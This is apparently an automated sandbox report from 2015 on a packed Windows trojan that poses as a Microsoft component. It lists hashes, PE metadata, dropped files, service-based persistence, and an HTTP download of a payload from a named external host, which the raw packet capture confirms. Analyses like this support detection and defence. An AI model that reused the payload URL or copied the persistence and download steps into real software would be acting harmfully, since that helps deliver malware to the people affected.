Analysis Date: 2015-05-27 08:07:36
MD5: 21d6e1b94bdcbc8297605553b37797b3
SHA1: abcdcb68aba468b4beb1042fea28157464fefa01

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: UPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section: UPX1 md5: d08014963794a4dd7ef023d79bfe22d6 sha1: 8db04e1652a64bebceff275400566ecea5302735 size: 7680
Section: .rsrc md5: eaf940a8d624ec62750cbdc6cb0cbb50 sha1: 11f6bc958ad0963b6a2f69cd535409815340a3d5 size: 1536
Timestamp: 2014-04-02 13:26:29
Version:
LegalCopyright: Copyright ? 2009
InternalName: Microsoft(R) Windows(R) Operating System
FileVersion: 2, 0, 0, 0
CompanyName: Microsoft Corporation
PrivateBuild:
LegalTrademarks:
Comments:
ProductName: Microsoft(R) Windows(R) Operating System
SpecialBuild:
ProductVersion: 2, 0, 0, 0
FileDescription: Microsoft Corporation
OriginalFilename: Server.dll
Packer: UPX -> www.upx.sourceforge.net
PEhash: f9d0ef13649f1b3cd56602ee7a756a09d7947ed1
IMPhash: 939782a3830d12b342b41dc0b9906cc1

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Wsmccs kemsgyyw\DeleteFiles ➝ C:\malware.exe\\x00
Creates File: C:\WINDOWS\Iwiyeoa.exe
Creates Process: C:\WINDOWS\Iwiyeoa.exe
Creates Process: C:\WINDOWS\Iwiyeoa.exe

Process
↳ C:\WINDOWS\Iwiyeoa.exe

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Wsmccs kemsgyyw\ConnectGroup ➝ 6\\xd4\\xc221\\xc8\\xd5\\x00
Creates Service: Sagmiy wwyyswqkyooawwysao - C:\WINDOWS\Iwiyeoa.exe

Process
↳ C:\WINDOWS\Iwiyeoa.exe

Creates File: pipe\net\NtControlPipe10
Creates File: C:\Program Files\AppPatch\NetSyst68.dll
Winsock URL: http://dhl2015.free3v.net/NetSyst68.jpg

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 804

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00

Process
↳ Pid 1868

Process
↳ Pid 1160

Network Details:

DNS: dhl2015.free3v.net
Type: A
1.1.1.1
DNS: momonophoto.com
Type: A
HTTP GET: http://dhl2015.free3v.net/NetSyst68.jpg
User-Agent: Mozilla/4.0 (compatible)

Raw Pcap
0x00000000 (00000)   47455420 2f4e6574 53797374 36382e6a   GET /NetSyst68.j
0x00000010 (00016)   70672048 5454502f 312e300d 0a557365   pg HTTP/1.0..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   290d0a48 6f73743a 2064686c 32303135   )..Host: dhl2015
0x00000050 (00080)   2e667265 6533762e 6e65740d 0a507261   .free3v.net..Pra
0x00000060 (00096)   676d613a 206e6f2d 63616368 650d0a0d   gma: no-cache...
0x00000070 (00112)   0a                                    .
